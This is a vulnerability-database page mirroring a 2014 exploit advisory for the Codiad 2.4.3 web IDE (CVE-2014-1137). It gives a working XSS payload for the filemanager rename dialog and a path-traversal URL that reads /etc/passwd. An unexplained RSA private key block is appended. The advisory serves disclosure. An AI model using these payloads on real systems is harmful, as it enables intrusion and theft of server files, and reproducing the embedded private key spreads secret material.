Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Codiad 2.4.3 Cross Site Scripting / Local File Inclusion

🗓️ 20 Dec 2014 00:00:00Reported by Taurus OmarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

Codiad 2.4.3 Cross Site Scripting / Local File Inclusion Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Codiad 2.4.3 Cross Site Scripting / Local File Inclusion Vulnerabilities
20 Dec 201400:00
zdt
0day.today		GQ File Manager 0.2.5 Sql Injection / Cross Site Scripting Vulnerabilities
20 Dec 201400:00
zdt
CVE		CVE-2014-1137
10 Jan 201500:00
cve
Cvelist		CVE-2014-1137
10 Jan 201500:00
cvelist
Exploit DB		GQ File Manager 0.2.5 - Multiple Vulnerabilities
19 Dec 201400:00
exploitdb
Exploit DB		Codiad 2.4.3 - Multiple Vulnerabilities
19 Dec 201400:00
exploitdb
exploitpack		Codiad 2.4.3 - Multiple Vulnerabilities
19 Dec 201400:00
exploitpack
exploitpack		GQ File Manager 0.2.5 - Multiple Vulnerabilities
19 Dec 201400:00
exploitpack
NVD		CVE-2014-1137
10 Jan 201500:59
nvd
Packet Storm		GQ File Manager 0.2.5 Cross Site Scripting / SQL Injection
20 Dec 201400:00
packetstorm
Rows per page
` -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
# Exploit Title: Codiad - Cross Site Scripting - Local File Inclusion Vulnerability's   
# Date: 19/12/2014  
# Url Vendor: http://codiad.com/  
# Vendor Name: Codiad  
# Version: 2.4.3  
# CVE: CVE-2014-1137  
# Author: TaurusOmar   
# Tiwtter: @TaurusOmar_  
# Email: [email protected]  
# Home: overhat.blogspot.com  
# Tested On: Bugtraq Optimus  
# Risk: High  
  
Description  
Codiad is a web-based IDE framework with a small footprint and minimal requirements.  
Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said even users of IDE's such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developer actively adding more.  
  
  
------------------------  
+ CROSS SITE SCRIPTING +   
------------------------  
#Exploiting Description - Get into code xss in next path  
  
/components/filemanager/dialog.php?action=rename&path=3&short_name=  
  
#P0c  
http://site.com/components/filemanager/dialog.php?action=rename&path=3&short_name='"><img src=x onerror=prompt(1);>  
  
#Proof Concept  
http://i.imgur.com/rr9b42K.jpg  
  
  
------------------------  
+ Local File Incluson +  
------------------------  
# Exploiting Description - Get into path in ur' browser and download private file server /etc/passwd   
  
#P0c  
http://site.com/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined  
  
#Proof Concept  
http://i.imgur.com/LSm360S.jpg  
  
  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Dec 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
codiadcross site scriptinglocal file inclusionvulnerabilityweb-based ide frameworkcve-2014-1137securityexploitxsslfirisk highrsa private key
43